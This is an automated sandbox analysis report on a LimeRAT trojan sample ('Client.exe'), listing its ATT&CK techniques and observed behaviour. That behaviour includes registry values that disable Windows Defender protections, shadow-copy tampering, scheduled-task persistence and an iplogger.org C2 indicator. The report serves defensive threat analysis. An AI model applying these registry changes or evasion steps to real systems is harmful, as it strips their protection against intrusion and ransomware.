Malware Analysis Report

2024-09-11 09:56

Sample ID 240619-11d92aybmj
Target Client.exe
SHA256 4c93b44d1550229fd328c058fbbfe44999ba01e2766b4d3df17c777ce643925e
Tags
limerat defense_evasion evasion execution impact ransomware rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4c93b44d1550229fd328c058fbbfe44999ba01e2766b4d3df17c777ce643925e

Threat Level: Known bad

The file Client.exe was found to be: Known bad.

Malicious Activity Summary

limerat defense_evasion evasion execution impact ransomware rat trojan

Modifies security service

Contains code to disable Windows Defender

LimeRAT

Modifies Windows Defender Real-time Protection settings

Limerat family

Deletes shadow copies

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Hide Artifacts: Hidden Files and Directories

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Views/modifies file attributes

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Scheduled Task/Job: Scheduled Task

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Disables Windows logging functionality

Uses Task Scheduler COM API

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Windows Management Instrumentation
T1047
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Persistence
TA0003
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Privilege Escalation
TA0004
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Defense Evasion
TA0005
Modify Registry
T1112
Impair Defenses
T1562
Disable or Modify Tools
T1562.001
Indicator Removal
T1070
File Deletion
T1070.004
Hide Artifacts
T1564
Hidden Files and Directories
T1564.001
Direct Volume Access
T1006
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
Peripheral Device Discovery
T1120
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Inhibit System Recovery
T1490
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-19 22:06

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Limerat family

limerat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-19 22:06

Reported

2024-06-19 22:07

Platform

win10-20240404-en

Max time kernel

38s

Max time network

34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

LimeRAT

rat limerat

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\1601268389\715946058.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\4183903823\2290032291.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\1601268389\715946058.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\4183903823\2290032291.pri C:\Windows\system32\taskmgr.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Disables Windows logging functionality

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 748 wrote to memory of 504 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 504 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 504 wrote to memory of 2968 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 504 wrote to memory of 2968 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 504 wrote to memory of 1160 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 504 wrote to memory of 1160 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 748 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 508 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 508 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
